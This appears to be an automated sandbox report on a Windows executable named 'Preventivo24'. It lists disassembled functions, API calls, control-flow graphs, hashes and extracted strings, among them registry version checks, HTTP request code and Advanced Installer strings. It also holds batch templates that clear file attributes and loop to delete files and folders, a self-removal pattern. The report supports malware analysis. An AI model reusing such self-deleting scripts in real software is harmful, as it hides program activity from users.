                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseOpen
                                                                              • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                                              • API String ID: 1586453840-3149529848
                                                                              • Opcode ID: 26be81554e82f3dff2b45e535bc308405132d2c3a824a2f8f04c6d67566e01e5
                                                                              • Instruction ID: 56726a718415ad73c78e36c6bcb9587bacb87abb435d4ec3893f323c37c5b357
                                                                              • Opcode Fuzzy Hash: 26be81554e82f3dff2b45e535bc308405132d2c3a824a2f8f04c6d67566e01e5
                                                                              • Instruction Fuzzy Hash: FB71B231B0030ADBDF64AA25DF42FAA72A5BB403D4F10807DD926A7681EB38CE45A741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 365 fc2c30-fc2cb0 RegOpenKeyExW 368 fc2f8e-fc2fa7 365->368 369 fc2cb6-fc2d19 RegQueryValueExW * 2 365->369 370 fc2fa9-fc2fb0 RegCloseKey 368->370 371 fc2fba-fc2fd3 call 108a6f5 368->371 372 fc2d7b-fc2dc0 RegQueryValueExW 369->372 373 fc2d1b-fc2d51 RegQueryValueExW 369->373 370->371 374 fc2de9 372->374 375 fc2dc2-fc2de7 call fc8a40 372->375 373->372 377 fc2d53-fc2d5b 373->377 379 fc2dee-fc2df5 374->379 375->379 377->377 381 fc2d5d-fc2d60 377->381 384 fc2e08-fc2e37 RegQueryValueExW 379->384 385 fc2df7-fc2dfc 379->385 381->372 382 fc2d62-fc2d75 381->382 382->372 387 fc2e5e-fc2e8d RegQueryValueExW 384->387 388 fc2e39-fc2e59 call fc8a40 384->388 385->384 386 fc2dfe 385->386 386->384 390 fc2e8f-fc2e9e 387->390 391 fc2eea-fc2efd 387->391 388->387 395 fc2ebf-fc2ecd 390->395 396 fc2ea0-fc2eab 390->396 392 fc2eff-fc2f13 call 108ab55 391->392 393 fc2f46-fc2f4e 391->393 392->393 407 fc2f15-fc2f43 GetModuleHandleW GetProcAddress call 108ab04 392->407 401 fc2f50-fc2f74 GetCurrentProcess IsWow64Process 393->401 402 fc2f82 393->402 398 fc2ecf 395->398 399 fc2eda-fc2ee5 395->399 397 fc2eb0-fc2ebd 396->397 397->395 397->397 404 fc2ed0-fc2ed8 398->404 399->391 401->402 409 fc2f76-fc2f80 401->409 403 fc2f84-fc2f89 call fc2fe0 402->403 403->368 404->399 404->404 407->393 409->403
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00FC2CA8
                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00FC2CE9
                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00FC2D0C
                                                                              • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00FC2D3F
                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00FC2DB8
                                                                              • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00FC2E2F
                                                                              • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00FC2E85
                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00FC2F23
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00FC2F2A
                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00FC2F61
                                                                              • IsWow64Process.KERNEL32 ref: 00FC2F70
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00FC2FAA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
                                                                              • String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                                                              • API String ID: 2654979339-3583743485
                                                                              • Opcode ID: fabff17dcac0373b732919a1f839684266d20d0dcffcd6f87ad7145d0496a820
                                                                              • Instruction ID: 6a11316bae1993b5baecb73a0714c0875e803a5a7a9be59e472fb03cae6363ed
                                                                              • Opcode Fuzzy Hash: fabff17dcac0373b732919a1f839684266d20d0dcffcd6f87ad7145d0496a820
                                                                              • Instruction Fuzzy Hash: B0A1AEB1901719DFDBB4CF20DD05FA9BBB6FB44721F0002AAE819A7280DB755A94CF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 874 ffbb40-ffbb94 call ffc950 877 ffbb9a-ffbd06 call e8ab00 ResetEvent HttpOpenRequestW SetEvent call e8b400 874->877 878 ffc836-ffc846 874->878 887 ffbd0c-ffbe79 call e8b400 877->887 888 ffc849-ffc85d call e8b070 * 2 877->888 887->888 899 ffbe7f-ffc03e 887->899 905 ffc040-ffc084 ResetEvent HttpSendRequestW 899->905 906 ffc096-ffc099 SetEvent 905->906 907 ffc086-ffc092 call ffca10 905->907 909 ffc09f-ffc0b1 906->909 907->909 912 ffc094 907->912 913 ffc0b4-ffc0e2 HttpQueryInfoW 909->913 912->913 914 ffc71b GetLastError 913->914 915 ffc0e8-ffc109 HttpQueryInfoW 913->915 916 ffc721 914->916 917 ffc10b-ffc110 915->917 918 ffc112 915->918 919 ffc724-ffc736 916->919 920 ffc115-ffc119 917->920 918->920 921 ffc74c-ffc761 919->921 922 ffc738-ffc748 919->922 923 ffc11b-ffc125 920->923 924 ffc154-ffc164 920->924 928 ffc777-ffc78e 921->928 929 ffc763-ffc773 921->929 922->921 923->924 927 ffc127-ffc14b HttpQueryInfoW 923->927 925 ffc16a-ffc170 924->925 926 ffc231-ffc235 924->926 925->926 930 ffc176-ffc22a call fb9400 HttpQueryInfoW call 108aca0 925->930 933 ffc2a9-ffc2b9 926->933 934 ffc237-ffc23d 926->934 927->924 936 ffc14d-ffc150 927->936 931 ffc7c0-ffc7d0 928->931 932 ffc790-ffc7ba ResetEvent InternetCloseHandle WaitForSingleObject * 2 928->932 929->928 930->926 941 ffc7d2-ffc7d9 InternetCloseHandle 931->941 942 ffc7e0-ffc7f5 931->942 932->931 938 ffc2bb-ffc2c2 933->938 939 ffc311-ffc316 933->939 934->933 943 ffc23f-ffc2a2 call fb9400 HttpQueryInfoW call 108aca0 934->943 936->924 938->939 944 ffc31c-ffc327 939->944 945 ffc6f7-ffc706 939->945 941->942 947 ffc80b-ffc82f InternetSetStatusCallbackW InternetCloseHandle 942->947 948 ffc7f7-ffc807 942->948 943->933 950 ffc53d-ffc544 944->950 951 ffc32d-ffc333 944->951 953 ffc708-ffc713 945->953 947->878 948->947 959 ffc54a-ffc5c3 950->959 960 ffc6f2-ffc6f5 950->960 951->950 955 ffc339-ffc33f 951->955 957 ffc716-ffc719 953->957 955->950 962 ffc345-ffc34b 955->962 957->916 959->919 972 ffc5c9-ffc5d1 call e8ac40 959->972 960->919 962->950 966 ffc351-ffc357 962->966 970 ffc35d-ffc367 call e8b400 966->970 971 ffc6e9-ffc6ee 966->971 970->888 978 ffc36d-ffc3b5 call ffd2d0 call e8b400 970->978 971->957 973 ffc6f0 971->973 972->905 973->953 978->888 985 ffc3bb-ffc3f9 call e8b400 978->985 985->888 991 ffc3ff-ffc425 call e8b400 985->991 991->888 996 ffc42b-ffc46c call ffd4a0 991->996 996->950
                                                                              APIs
                                                                                • Part of subcall function 00FFC950: ResetEvent.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC963
                                                                                • Part of subcall function 00FFC950: InternetConnectW.WININET(00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92,00FFBB92), ref: 00FFC986
                                                                                • Part of subcall function 00FFC950: GetLastError.KERNEL32(?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983,?,00000000), ref: 00FFC990
                                                                                • Part of subcall function 00FFC950: WaitForSingleObject.KERNEL32(?,0000000A,?,?,00000000,00000000,00FFBB92,?,?,?,?,?,00000003,00000000,B5580983), ref: 00FFC9CA
                                                                              • ResetEvent.KERNEL32(?,?,?,?,?,?,00000003,00000000,B5580983), ref: 00FFBC1B
                                                                              • HttpOpenRequestW.WININET(?,?,?,HTTP/1.0,01142730,0115F120,?,?), ref: 00FFBC3E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: EventReset$ConnectErrorHttpInternetLastObjectOpenRequestSingleWait
                                                                              • String ID: HTTP/1.0
                                                                              • API String ID: 3963449110-401229808
                                                                              • Opcode ID: 5007dd8110c050689d11a1a6ca1f8c8faf90039a253411fc8747718c0310ee80
                                                                              • Instruction ID: c0b42f10053c76f6b0415a83a73fd89abda6af0e8de58e28949839a6de8132b1
                                                                              • Opcode Fuzzy Hash: 5007dd8110c050689d11a1a6ca1f8c8faf90039a253411fc8747718c0310ee80
                                                                              • Instruction Fuzzy Hash: 7E326470D0022DDFDB25CFA8CA48BAEBBF5BF08314F144169E915A72A1DB34A945DF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1001 fa2870-fa28af call e8b400 1004 fa293f-fa29b4 call e8b070 GetModuleFileNameW call e8b400 1001->1004 1005 fa28b5-fa28ee 1001->1005 1014 fa29ba-fa29e0 1004->1014 1015 fa2db3-fa2db8 call e8b070 1004->1015 1012 fa290d-fa2926 call fa44e0 1005->1012 1013 fa28f0-fa290b call fa44e0 1005->1013 1023 fa2929-fa293c 1012->1023 1013->1023 1028 fa29e2-fa29ee call e8a880 1014->1028 1029 fa29f0-fa29f9 1014->1029 1021 fa2dbd-fa2dc2 call 1095fb1 1015->1021 1025 fa2dc7-fa2e0d FreeLibrary call fa84f0 1021->1025 1035 fa2a1f-fa2a41 call fa4220 call fbd6c0 1028->1035 1032 fa2a00-fa2a09 1029->1032 1032->1032 1034 fa2a0b-fa2a1a call e8aee0 1032->1034 1034->1035 1035->1021 1041 fa2a47-fa2a69 GetModuleHandleW 1035->1041 1042 fa2a6b-fa2a7f call 108ab55 1041->1042 1043 fa2aa7-fa2aaf 1041->1043 1042->1043 1052 fa2a81-fa2aa4 GetProcAddress call 108ab04 1042->1052 1045 fa2ac0-fa2acb 1043->1045 1046 fa2ab1-fa2abe SetSearchPathMode 1043->1046 1048 fa2b09-fa2b11 1045->1048 1049 fa2acd-fa2ae1 call 108ab55 1045->1049 1046->1045 1050 fa2b22-fa2b2d 1048->1050 1051 fa2b13-fa2b20 1048->1051 1049->1048 1064 fa2ae3-fa2b06 GetProcAddress call 108ab04 1049->1064 1056 fa2b6b-fa2b73 1050->1056 1057 fa2b2f-fa2b43 call 108ab55 1050->1057 1051->1050 1052->1043 1062 fa2b84-fa2d39 1056->1062 1063 fa2b75-fa2b82 SetDefaultDllDirectories 1056->1063 1057->1056 1069 fa2b45-fa2b68 GetProcAddress call 108ab04 1057->1069 1065 fa2d40-fa2d42 call f773d0 1062->1065 1063->1062 1064->1048 1072 fa2d47-fa2d52 1065->1072 1069->1056 1072->1065 1074 fa2d54-fa2d7a 1072->1074 1076 fa2d7c-fa2d8c 1074->1076 1077 fa2d90-fa2db2 call 108a6f5 1074->1077 1076->1077
                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,B5580983,00000000,?,?,?,000000FF), ref: 00FA29A5
                                                                              • GetModuleHandleW.KERNEL32(kernel32,.local,?,?,?,?,000000FF), ref: 00FA2A4C
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00FA2A8B
                                                                              • SetSearchPathMode.KERNEL32 ref: 00FA2ABE
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00FA2AED
                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FA2B4F
                                                                              • SetDefaultDllDirectories.KERNELBASE ref: 00FA2B82
                                                                                • Part of subcall function 00F773D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F77412
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              • FreeLibrary.KERNEL32(?,B5580983,00000000,010B1B00,000000FF,?,000000E1,80004005,?,?,000000FF), ref: 00FA2DF4
                                                                                • Part of subcall function 00FA84F0: EnterCriticalSection.KERNEL32(011D001C,B5580983), ref: 00FA852F
                                                                                • Part of subcall function 00FA84F0: DestroyWindow.USER32(00000000), ref: 00FA854D
                                                                                • Part of subcall function 00FA84F0: LeaveCriticalSection.KERNEL32(011D001C), ref: 00FA8596
                                                                              Strings
                                                                              • kernel32, xrefs: 00FA2A47
                                                                              • SetDefaultDllDirectories, xrefs: 00FA2B49
                                                                              • kernel32.dll, xrefs: 00FA2C67
                                                                              • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00FA28F4
                                                                              • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00FA2912
                                                                              • SetDllDirectory, xrefs: 00FA2AE7
                                                                              • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00FA2917, 00FA291F
                                                                              • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00FA28F9, 00FA2901
                                                                              • SetSearchPathMode, xrefs: 00FA2A85
                                                                              • .local, xrefs: 00FA2A26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CriticalHeapModuleSection$AllocateDefaultDestroyDirectoriesDirectoryEnterFileFreeHandleLeaveLibraryModeNamePathProcessSearchSystemWindow
                                                                              • String ID: .local$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                                              • API String ID: 863123761-2126665378
                                                                              • Opcode ID: 030e34a89c0eaf35da85feead7d10443c4c1221d5700f0b08e2ecff5af7aa154
                                                                              • Instruction ID: b3f3df500ef9df762ef723b0e6e1af66a183e4b01915473a354755a34e500fc0
                                                                              • Opcode Fuzzy Hash: 030e34a89c0eaf35da85feead7d10443c4c1221d5700f0b08e2ecff5af7aa154
                                                                              • Instruction Fuzzy Hash: 1BE18CB0901248DFCBA8DF59DA49BEE7BB5FB45318F108119EC29AB381D7745A08CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1207 fdaf70-fdafc5 call 1003a20 call e8b400 1212 fdafcb-fdaffd 1207->1212 1213 fdba87-fdba8c call e8b070 1207->1213 1220 fdafff-fdb008 call e8a880 1212->1220 1221 fdb00a-fdb011 call e8aee0 1212->1221 1216 fdba91 call 108fa4f 1213->1216 1219 fdba96 call 108fa4f 1216->1219 1224 fdba9b-fdbadf call e8b070 1219->1224 1228 fdb016-fdb046 call 108aca0 1220->1228 1221->1228 1231 fdbb65-fdbb79 1224->1231 1232 fdbae5-fdbaee call e8b400 1224->1232 1235 fdb048-fdb04b 1228->1235 1236 fdb090-fdb09d call e8b400 1228->1236 1241 fdbb7a-fdbb84 call e8b070 1232->1241 1242 fdbaf4-fdbb4f call ea5220 call fbc8e0 call ff65c0 1232->1242 1235->1236 1239 fdb04d-fdb064 WideCharToMultiByte 1235->1239 1236->1213 1244 fdb0a3-fdb0d3 call ec4df0 1236->1244 1239->1236 1243 fdb066-fdb08a call 108aca5 WideCharToMultiByte 1239->1243 1242->1231 1266 fdbb51-fdbb61 1242->1266 1243->1236 1259 fdb0d5-fdb0dc call fa4d30 1244->1259 1260 fdb0e1-fdb0ee call e8b400 1244->1260 1259->1260 1260->1213 1267 fdb0f4-fdb11a 1260->1267 1266->1231 1271 fdb11c-fdb122 1267->1271 1272 fdb135-fdb13c call fa4450 1267->1272 1271->1272 1273 fdb124-fdb133 call e8a880 1271->1273 1276 fdb141-fdb192 call fb8ff0 call 1003ad0 1272->1276 1273->1276 1282 fdb1b5-fdb1cc 1276->1282 1283 fdb194-fdb1b2 1276->1283 1284 fdb1ef-fdb200 1282->1284 1285 fdb1ce-fdb1ec 1282->1285 1283->1282 1287 fdb219-fdb24d call 108aca0 1284->1287 1288 fdb202-fdb216 1284->1288 1285->1284 1294 fdb24f-fdb263 1287->1294 1295 fdb266-fdb26d 1287->1295 1288->1287 1294->1295 1297 fdb31d-fdb37b call 1004690 SetEvent call 1004160 1295->1297 1298 fdb273-fdb28e call fe9d60 call e8b400 1295->1298 1310 fdba47-fdba51 call 1004f60 1297->1310 1311 fdb381-fdb39e call fe9d60 call e8b400 1297->1311 1298->1213 1312 fdb294-fdb2fe call febd40 call fe3410 SetEvent 1298->1312 1316 fdba56-fdba84 call 1003be0 call 108a6f5 1310->1316 1311->1213 1324 fdb3a4-fdb3d8 1311->1324 1312->1316 1331 fdb304-fdb318 1312->1331 1333 fdb3ec-fdb3f0 1324->1333 1334 fdb3da-fdb3e6 call ea5bf0 1324->1334 1331->1316 1337 fdb948-fdb955 call e8b400 1333->1337 1338 fdb3f6-fdb424 call 1003da0 1333->1338 1334->1333 1337->1213 1347 fdb95b-fdb993 call fe3410 1337->1347 1345 fdb447-fdb47c call 1003c90 1338->1345 1346 fdb426-fdb444 1338->1346 1352 fdb49f-fdb4ca call 1003da0 1345->1352 1353 fdb47e-fdb49c 1345->1353 1346->1345 1362 fdb998-fdb9b0 1347->1362 1360 fdb4cc-fdb4e2 1352->1360 1361 fdb4ea-fdb50d 1352->1361 1353->1352 1360->1361 1363 fdb510-fdb519 1361->1363 1364 fdb9d0-fdb9ff call 1003da0 1362->1364 1365 fdb9b2-fdb9c8 1362->1365 1363->1363 1368 fdb51b-fdb596 call e887f0 call e87cf0 call fae4f0 call faeda0 call f9fab0 call e88ed0 1363->1368 1374 fdba1f-fdba31 1364->1374 1375 fdba01-fdba0f 1364->1375 1365->1364 1389 fdb598-fdb5aa 1368->1389 1390 fdb5ca-fdb614 call e887f0 call f641e0 1368->1390 1374->1310 1376 fdba33-fdba43 1374->1376 1379 fdba17 1375->1379 1376->1310 1379->1374 1391 fdb5ac-fdb5ba 1389->1391 1392 fdb5c0-fdb5c7 call 108a703 1389->1392 1399 fdb648-fdb68d call ff83c0 call fae210 1390->1399 1400 fdb616-fdb628 1390->1400 1391->1216 1391->1392 1392->1390 1409 fdb68f-fdb691 1399->1409 1410 fdb697-fdb6a4 call e8b400 1399->1410 1402 fdb63e-fdb645 call 108a703 1400->1402 1403 fdb62a-fdb638 1400->1403 1402->1399 1403->1219 1403->1402 1409->1410 1410->1224 1413 fdb6aa-fdb6d4 1410->1413 1416 fdb705 1413->1416 1417 fdb6d6-fdb6dc 1413->1417 1420 fdb707-fdb70f call e8aee0 1416->1420 1418 fdb6ef-fdb6f1 1417->1418 1419 fdb6de-fdb6ed call e8a880 1417->1419 1422 fdb6f4-fdb6fd 1418->1422 1426 fdb714-fdb749 call ff9720 1419->1426 1420->1426 1422->1422 1425 fdb6ff-fdb703 1422->1425 1425->1420 1429 fdb769-fdb7a4 call e88ed0 call 1003da0 1426->1429 1430 fdb74b-fdb761 1426->1430 1436 fdb7c4-fdb7fa call 1003c90 1429->1436 1437 fdb7a6-fdb7bc 1429->1437 1430->1429 1441 fdb7fc-fdb812 1436->1441 1442 fdb81a-fdb846 call 1003da0 1436->1442 1437->1436 1441->1442 1446 fdb848-fdb85e 1442->1446 1447 fdb866-fdb8df call fe56a0 call fe11b0 call fe6f90 1442->1447 1446->1447 1455 fdb8f1-fdb908 1447->1455 1456 fdb8e1-fdb8e2 call 10945db 1447->1456 1458 fdb91a-fdb943 call fd7300 call e88ed0 1455->1458 1459 fdb90a-fdb913 call 10945db 1455->1459 1460 fdb8e7-fdb8ea 1456->1460 1458->1364 1459->1458 1460->1455
                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00FDB056
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00FDB08A
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$FindHeapProcessResource
                                                                              • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\
                                                                              • API String ID: 2083075878-297406034
                                                                              • Opcode ID: e47e021cab78f09f8bb2028fe071e76ea4fb5135416ca3a39dc665a746bef211
                                                                              • Instruction ID: 10748539cf9bd2e3a2ea7d50efc66bf858244cebf50c5ae4aee3c3132f0c0e4c
                                                                              • Opcode Fuzzy Hash: e47e021cab78f09f8bb2028fe071e76ea4fb5135416ca3a39dc665a746bef211
